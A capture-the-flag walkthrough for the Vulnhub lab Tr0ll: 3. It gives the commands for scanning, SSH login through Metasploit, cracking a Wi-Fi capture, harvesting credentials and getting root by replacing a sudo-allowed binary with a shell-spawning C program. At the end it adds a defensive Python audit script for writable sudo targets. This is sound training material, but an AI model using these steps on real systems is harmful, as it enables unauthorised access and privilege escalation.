Today we are going to solve another CTF challenge called “Tr0ll: 3”, which is part of the Tr0ll series. It is available on Vulnhub for online penetration testing practice. This lab is not that difficult if we have the proper basic knowledge of penetration testing. Credit for making this lab goes to Maleus. Let’s start and learn how to successfully breach it.
Level: Intermediate
Since these labs are available on the Vulnhub website, we will be downloading the .ova file from this link. We will be running this lab in VMware Player or VirtualBox. After starting the lab, we used the netdiscover command to find the IP address of the lab. It turned out to be 192.168.1.104.
netdiscover
We are going to start our attack with a port scan, using the leading scanning tool “nmap”. We will perform an aggressive scan. From the scan output, we can see that the SSH port is open on the target machine.
nmap -A 192.168.1.104
When we started the lab, we were greeted with a banner as shown in the given image. Here we are hinted at the password: after the login prompt, “Start here” is written in the format:
start:here
Login credentials are usually written in this format.
So, we fired up the Metasploit Framework in our Kali Linux with the msfconsole command. To log in we will use Metasploit's SSH login scanner auxiliary module. We selected the auxiliary with the “use” command. After that we used the “set” command to provide the target IP address, which is passed in the rhosts parameter (rhosts means remote hosts). Then we provided the username and password and ran exploit. After running it we got a meterpreter session. We tried to use the LinEnum script, but we couldn’t find anything with it.
msf5 > use auxiliary/scanner/ssh/ssh_login
msf5 auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.1.104
msf5 auxiliary(scanner/ssh/ssh_login) > set username start
msf5 auxiliary(scanner/ssh/ssh_login) > set password here
msf5 auxiliary(scanner/ssh/ssh_login) > exploit
meterpreter > cd /tmp
meterpreter > upload /root/LinEnum.sh
meterpreter > shell
python -c 'import pty;pty.spawn("/bin/bash")'
chmod 777 LinEnum.sh
./LinEnum.sh
As LinEnum couldn’t help, we tried to enumerate with the find command, listing files by their permissions with the -perm parameter. We specifically wanted those files which have all permissions set (0777). After a bit of enumeration, we found a .cap file and a text file, so we downloaded both with the meterpreter download command.
find / -type f -perm 0777 2>/dev/null
meterpreter > cd /var/log/.dist-manage
meterpreter > ls
meterpreter > download wytshadow.cap /root/Desktop
meterpreter > cd /.hints/lol/rofl/roflmao/this/isnt/gonna/stop/anytime/soon/still/going/lol/annoyed/almost/there/jk/no/seriously/last/one/rofl/ok/ill/stop/however/this/is/fun/ok/here/rofl/sorry/you/made/it
meterpreter > download gold_star.txt /root/Desktop/
Since we have a .cap file, it can be opened with Wireshark. After opening the file in Wireshark, we found that all the packets have their protocol marked as “802.11”. This seems to be a hint.
We already knew a bit about 802.11, but for those who don’t: it is the set of LAN protocols that specifies the media access control and physical layer protocols for implementing wireless local area network (Wi-Fi) computer communication.
Now that we know these are packets of Wi-Fi traffic, let’s use aircrack-ng to recover the password, using the text file as the wordlist and the capture file as input, as shown in the image given below. aircrack-ng gave us the password gaUoCe34t1.
aircrack-ng -w gold_star.txt wytshadow.cap
Now that we have the password, let’s switch user with the su command. We use the name wytshadow, which is the same name as the cap file. After successfully logging in, we look around and find a file named oohfun. It has permission to run as root. With this in mind, we ran the file as shown in the given figure. In its output we can see the name LYNX, which is a browser; maybe it will have something to do with what comes next.
su wytshadow
cd
ls -al
./oohfun
Now we used the sudo -l command to find the commands we can run as root. We can see that nginx is available for us to run as root. So we looked around for more clues related to nginx and traversed into the nginx directory to find the sites-enabled directory. On opening the default file with the cat command, we see that the user agent is checked for Lynx. This means that websites here will only open in the Lynx browser.
sudo -l
cd /etc/nginx
ls
cd sites-enabled
ls
cat default
Next, we started the nginx service as shown in the given image. Using the netstat command we can see that port 8080 is now open. It was not open when we ran the nmap scan.
sudo /usr/sbin/service nginx start
netstat -antp
As discussed earlier, we are going to need the Lynx browser. After installing Lynx, we open the page served on the port we just opened.
apt install lynx
lynx http://192.168.1.104 -i key
On opening the link given in the page through Lynx, we find these login credentials. That was not that difficult, was it?
Credentials Found:
Username: genphlux
Password: HF9nd0cr!
With the new credentials, we switched to the user genphlux using the su command. After logging in, we looked around and found a file named maleus. We used the file command to identify the type of the maleus file, as shown in the given image, and then opened it with the cat command so we could copy it to our system.
su genphlux
cd
ls -al
file maleus
cat maleus
Now that we have the private key, we copied it into a text editor and saved it as “key”. After saving it, we changed its permissions with the chmod command, because SSH refuses to use a private key that is readable by everyone. Then we logged in using the key as shown in the image given. After successfully logging in, we looked around and found a file named “dont_even_bother”. We used the file command to find its type; it came out to be an ELF 64-bit executable. After this we listed the directory in which we found this file with the ls command and the -a flag to see if there were any hidden files. We found a “.viminfo” file. It seems interesting.
chmod 600 key
ssh maleus@192.168.1.104 -i key
We used the cat command to inspect the .viminfo file. On close inspection, we found a password for another user: “B^slc8I$”. This is a good discovery.
cat .viminfo
Now that we have the password, let’s find the commands that can run as root. We are going to use the sudo -l command for this. After running it, we find that the dont_even_bother file we found earlier is the one that runs with root permissions. So in order to escalate privileges on this machine, we are going to use this file. First we empty the contents of the file using the echo command as shown in the image given. Now that the file is empty, let’s write a replacement using the nano command.
sudo -l
echo "" > dont_even_bother
nano dont_even_bother.c
After opening the file, we wrote this small program inside it, which invokes a shell. As this file gets executed as root, the shell it invokes will be a root shell as well. After editing, we save the file and exit nano.
#include <stdlib.h>
#include <unistd.h>

int main(void) {
    setresuid(0, 0, 0);   /* keep real, effective and saved uid at root */
    system("/bin/sh");    /* spawn a shell with those privileges */
    return 0;
}
Since it is a “.c” file, we have to compile it with the gcc compiler, using the command provided. Running the resulting binary through sudo gives us a root shell, and the flag is in /root.
gcc dont_even_bother.c -o dont_even_bother
sudo /home/maleus/dont_even_bother
id
cd /root
ls
cat flag.txt
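The root of this privilege escalation is a sudo rule that points at a binary the same user can overwrite, and the earlier find -perm 0777 sweep is the same class of check (writable files and directories) from the other side. The audit script below is an added example, not part of this write-up or of the Tr0ll: 3 machine: it parses sudoers-style rules, resolves each command path, and flags any command (or its parent directory) that the rule's own user can write to. The sudoers lines, user ids and file metadata are constructed sample data modelled on what the write-up describes; os_stat can be passed instead to run it against a real system.

```python
"""Flag sudo rules whose command the rule's own user could replace.

Added audit example (not from the Tr0ll: 3 write-up). The sudoers lines,
uid/gid mapping and file metadata at the bottom are constructed samples.
"""
import os
import re
import stat
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional, Tuple

# Subset of the sudoers grammar: "user HOST=(runas) [TAG:]... cmd [args][, cmd ...]"
RULE_RE = re.compile(r"^(?P<user>\S+)\s+\S+\s*=\s*(?:\([^)]*\)\s*)?(?P<cmds>.+)$")
TAG_RE = re.compile(r"^(?:[A-Z]+:\s*)+")  # NOPASSWD:, SETENV:, ...


@dataclass(frozen=True)
class FileMeta:
    uid: int
    gid: int
    mode: int  # permission bits only (stat.S_IMODE)


StatFn = Callable[[str], Optional[FileMeta]]  # path -> metadata, None if absent


def os_stat(path: str) -> Optional[FileMeta]:
    """Real filesystem lookup for use on a live host."""
    try:
        st = os.stat(path)
    except OSError:
        return None
    return FileMeta(st.st_uid, st.st_gid, stat.S_IMODE(st.st_mode))


def parse_sudoers(lines) -> List[Tuple[str, str]]:
    """Return (user, command_path) pairs; 'ALL' commands and Defaults are skipped."""
    pairs = []
    for raw in lines:
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        for spec in m.group("cmds").split(","):
            spec = TAG_RE.sub("", spec.strip())
            cmd = spec.split()[0] if spec else ""
            if cmd and cmd != "ALL":
                pairs.append((m.group("user"), cmd))
    return pairs


def writable_by(meta: FileMeta, uid: int, gids) -> bool:
    """True if a non-root uid with these groups can write to the object."""
    if meta.uid == uid and meta.mode & stat.S_IWUSR:
        return True
    if meta.gid in gids and meta.mode & stat.S_IWGRP:
        return True
    return bool(meta.mode & stat.S_IWOTH)


def audit_sudo_rules(sudoers_lines, users: Dict[str, Tuple[int, List[int]]],
                     stat_fn: StatFn = os_stat) -> List[Tuple[str, str, str]]:
    """users maps username -> (uid, [gids]). Returns (user, command, reason) findings."""
    findings = []
    for user, cmd in parse_sudoers(sudoers_lines):
        if user not in users:
            continue
        uid, gids = users[user]
        if uid == 0:
            continue  # root gains nothing from sudo
        target = stat_fn(cmd)
        if target is None:
            findings.append((user, cmd, "command does not exist"))
        elif writable_by(target, uid, gids):
            findings.append((user, cmd, "command file is writable by the user"))
        parent = stat_fn(os.path.dirname(cmd) or "/")
        if parent is not None and writable_by(parent, uid, gids):
            findings.append((user, cmd, "parent directory is writable by the user"))
    return findings


# Constructed sample data modelled on the write-up: wytshadow may start nginx,
# maleus may run a binary that lives in maleus's own home directory.
SAMPLE_SUDOERS = [
    "Defaults env_reset",
    "root ALL=(ALL:ALL) ALL",
    "wytshadow ALL=(root) NOPASSWD: /usr/sbin/service nginx start",
    "maleus ALL=(root) NOPASSWD: /home/maleus/dont_even_bother",
]
SAMPLE_USERS = {"root": (0, [0]), "wytshadow": (1001, [1001]), "maleus": (1002, [1002])}
SAMPLE_FS = {
    "/usr/sbin": FileMeta(0, 0, 0o755),
    "/usr/sbin/service": FileMeta(0, 0, 0o755),
    "/home/maleus": FileMeta(1002, 1002, 0o755),
    "/home/maleus/dont_even_bother": FileMeta(1002, 1002, 0o755),
}


def run_sample() -> List[Tuple[str, str, str]]:
    return audit_sudo_rules(SAMPLE_SUDOERS, SAMPLE_USERS, SAMPLE_FS.get)


if __name__ == "__main__":
    for user, cmd, reason in run_sample():
        print(f"[!] {user}: {cmd}: {reason}")
```

On the sample data the nginx rule is clean (root-owned binary in a root-owned directory), while the maleus rule is reported twice: the binary itself is owner-writable, and so is the directory it sits in, which is enough to swap the file even if its own mode were tightened. The fix on a real host is to keep anything referenced by sudoers under a root-owned, non-writable path.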